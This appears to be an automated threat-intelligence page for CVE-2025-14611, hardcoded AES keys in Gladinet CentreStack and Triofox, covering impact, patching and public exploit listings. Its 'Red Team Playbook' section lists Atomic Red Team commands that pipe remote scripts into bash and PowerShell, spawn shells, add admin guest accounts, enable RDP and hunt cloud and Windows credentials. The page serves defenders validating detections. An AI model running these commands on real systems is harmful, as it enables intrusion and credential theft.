CVE-2025-14611
Overview
This vulnerability is a hardcoded credentials flaw involving the use of fixed AES cryptographic keys within Gladinet CentreStack and TrioFox prior to version 16.12.10420.56791. The root cause lies in the insecure implementation of AES cryptoscheme parameters embedded directly in the application code. This affects cryptographic components responsible for securing communications and file handling in publicly exposed endpoints of the affected products.
Vulnerability Description
Gladinet CentreStack and Triofox prior to version 16.12.10420.56791 used hardcoded values for their implementation of the AES cryptoscheme. This degrades security for public exposed endpoints that may make use of it and may offer arbitrary local file inclusion when provided a specially crafted request without authentication. This opens the door for future exploitation and can be leveraged with previous vulnerabilities to gain a full system compromise.
Impact
An unauthenticated attacker can exploit this vulnerability to perform arbitrary local file inclusion on the affected systems, potentially accessing sensitive files and executing unauthorized commands. This can be combined with other existing vulnerabilities to escalate privileges and gain full system control. No user interaction or credentials are required to exploit this flaw. The consequence includes unauthorized data exposure, system compromise, and potential lateral movement within the network environment.
Solution
Remediation requires updating Gladinet CentreStack and TrioFox to version 16.12.10420.56791 or later, where the hardcoded AES keys have been removed or replaced with secure implementations. Detailed patch instructions and advisories are available from the vendor and referenced in the Huntress blog post. Administrators should apply the vendor-provided updates promptly to mitigate this vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Gladinet CentreStack and Triofox stems from the use of hardcoded values within their implementation of the AES cryptoscheme. Hardcoding cryptographic keys or parameters significantly undermines the security posture of any application, as it allows attackers to easily reverse-engineer the software and extract these values. In this case, the hardcoded values can lead to predictable encryption outcomes, making it feasible for an attacker to decrypt sensitive data or impersonate legitimate users. Furthermore, the presence of this vulnerability in public-facing endpoints exacerbates the risk, as these endpoints are often the first line of defense against external threats.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could craft a specially designed request that takes advantage of the weak encryption implementation, potentially leading to arbitrary local file inclusion. This means that an attacker could gain unauthorized access to files on the server, which may contain sensitive information or configuration files that could facilitate further attacks. The lack of authentication requirements for these requests makes the exploitation process even easier, as attackers do not need to authenticate themselves to execute malicious commands. By chaining this vulnerability with other known vulnerabilities, an attacker could escalate their privileges and achieve full system compromise, leading to severe consequences for the affected organization.
The real-world impact of this vulnerability is substantial, particularly for businesses that rely on Gladinet's solutions for data management and collaboration. The potential for unauthorized access to sensitive files can result in data breaches, which may lead to regulatory fines, loss of customer trust, and reputational damage. Additionally, if an attacker successfully exploits this vulnerability to gain control over the system, they could deploy ransomware, exfiltrate proprietary information, or disrupt business operations. The financial implications of such incidents can be devastating, with costs associated with incident response, legal fees, and potential settlements with affected parties.
To detect and mitigate the risks associated with this vulnerability, organizations should adopt a multi-layered security approach. Regularly updating software to the latest versions is crucial, as vendors often release patches that address known vulnerabilities. In this case, upgrading to versions of Gladinet CentreStack and Triofox released after the vulnerability was identified is essential. Organizations should also implement robust monitoring and logging practices to detect any unusual activity that may indicate exploitation attempts. Employing web application firewalls (WAFs) can help filter out malicious requests before they reach the vulnerable endpoints. Additionally, conducting regular security assessments and penetration testing can help identify and remediate vulnerabilities before they can be exploited by malicious actors.
In conclusion, the vulnerability present in Gladinet CentreStack and Triofox represents a significant security risk due to its potential for exploitation and the severe consequences that could follow. Organizations using these products must prioritize timely updates and implement comprehensive security measures to protect against potential attacks. By understanding the nature of the vulnerability and employing proactive strategies, businesses can mitigate risks and safeguard their sensitive data from unauthorized access and exploitation.
The threat landscape for CVE-2025-14611 has materially shifted with the recent emergence of a Metasploit module targeting the Gladinet CentreStack and Triofox vulnerability. This development significantly lowers the technical barrier for exploitation, enabling a broader range of adversaries to leverage the hardcoded AES cryptoscheme weakness to forge access tickets and perform arbitrary local file inclusion. CSURFACE threat intelligence notes a marked increase in the Exploit Prediction Scoring System (EPSS) score, reflecting heightened likelihood of exploitation in the wild. Our telemetry corroborates a steady upward trend in exploit attempts, underscoring growing attacker interest. Although ransomware usage linked to this vulnerability remains unconfirmed, the expanded exploit toolkit and increased accessibility elevate the overall threat level to critical. Defenders should recognize that this evolution signals a shift from theoretical risk to practical, active exploitation, demanding heightened vigilance in monitoring and response efforts.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Gladinet | Centrestack | All |
cpe:2.3:a:gladinet:centrestack:*:*:*:*:*:*:*:*
|
|
|
Gladinet | Triofox | All |
cpe:2.3:a:gladinet:triofox:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Gladinet CentreStack/Triofox Access Ticket Forge
auxiliary/gather/gladinet_storage_access_ticket_forge
|
Huntress Team | Unknown | - | View |
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
pl4tyz/CVE-2025-14611-CentreStack-and-Triofox-full-Poc-Exploit
CVE-2025-14611 CentreStack and Triofox full Poc/Exploit
|
pl4tyz | 0 | 0 | 2025-12-29 | View |
Threat Feed
5 eventsSighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-191 | Read Sensitive Constants Within an Executable |
38%
|
— | Low | |
| CAPEC-70 | Try Common or Default Usernames and Passwords |
36%
|
Medium | High |
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
net user #{guest_user} /active:yes
sudo sysadminctl -guestAccount on
net user #{guest_user} /active:yes
net user #{guest_user} #{guest_password}
net localgroup #{local_admin_group} #{guest_user} /add
net localgroup "#{remote_desktop_users_group_name}" #{guest_user} /add
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-14611 |
| huntress.com |
GitHub CVE
|
https://www.huntress.com/blog/active-exploitation-gladinet-centrestack-triofox-insecure-cryptography-vulnerability |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-14611 |